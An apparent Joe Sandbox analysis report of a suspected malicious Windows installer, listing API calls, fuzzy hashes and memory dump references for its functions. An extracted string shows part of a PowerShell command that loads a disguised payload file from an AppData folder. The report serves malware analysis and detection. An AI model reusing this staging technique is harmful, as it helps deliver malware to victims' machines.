Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4

Function 004060B4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4

Function 00402419 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759

Function 004063AE Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040643C,?,?,?,?,: Completed,?,00000000), ref: 004063D2

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: 160c38975f312424f4866d14917befa5dd24af40cdf73f4d33e28196d90f96f9
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 44D0123204020EBBDF115E90ED01FAB3B1DAB08350F014426FE06E40A0D775D534A754

Function 004015C8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 505856000b56d662a9aa875b3a3f8f40bf86435686472c5d4cf907b3c1585cba
Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
Opcode Fuzzy Hash: 505856000b56d662a9aa875b3a3f8f40bf86435686472c5d4cf907b3c1585cba
Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D

Function 0040450C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D

Function 00405B67 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B76

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29

Function 004034D4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08

Function 004044E2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19

Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055C6: lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
Part of subcall function 004055C6: lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
Part of subcall function 004055C6: SetWindowTextW.USER32(matrices,matrices), ref: 00405633
Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681

Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010

Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13

Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 6661bbc6a6cbc62f2ae8f9ac3ffc578f0765c459b67b1fe30ee97d11a41af7f8
Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
Opcode Fuzzy Hash: 6661bbc6a6cbc62f2ae8f9ac3ffc578f0765c459b67b1fe30ee97d11a41af7f8
Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E

Non-executed Functions

Function 004049B1 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A00
SetWindowTextW.USER32(00000000,?), ref: 00404A2A
SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
CoTaskMemFree.OLE32(00000000), ref: 00404AE6
lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36

Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98

Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ugpJX5h56S.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\ugpJX5h56S.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
Part of subcall function 004067EF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879

GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14

Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A

Strings

A, xrefs: 00404AD4
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00404B01
"$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncran, xrefs: 004049CA
: Completed, xrefs: 00404B12, 00404B17, 00404B22

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncran$: Completed$A$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis
API String ID: 2624150263-2083065441
Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D

Function 00404F2D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F45
GetDlgItem.USER32(?,00000408), ref: 00404F50
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
SendMessageW.USER32(?,00001109,00000002), ref: 00405006
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
DeleteObject.GDI32(00000000), ref: 00405027
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129

Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503

SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
GetWindowLongW.USER32(?,000000F0), ref: 0040516B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
ShowWindow.USER32(?,00000005), ref: 00405189
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
ImageList_Destroy.COMCTL32(00000000), ref: 00405357
GlobalFree.KERNEL32(00000000), ref: 00405367
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
SendMessageW.USER32(?,00001102,?,?), ref: 00405489
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
ShowWindow.USER32(?,00000000), ref: 00405511
GetDlgItem.USER32(?,000003FE), ref: 0040551C
ShowWindow.USER32(00000000), ref: 00405523

Strings

N, xrefs: 004051C2
, xrefs: 004054FB
M, xrefs: 004050E1

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
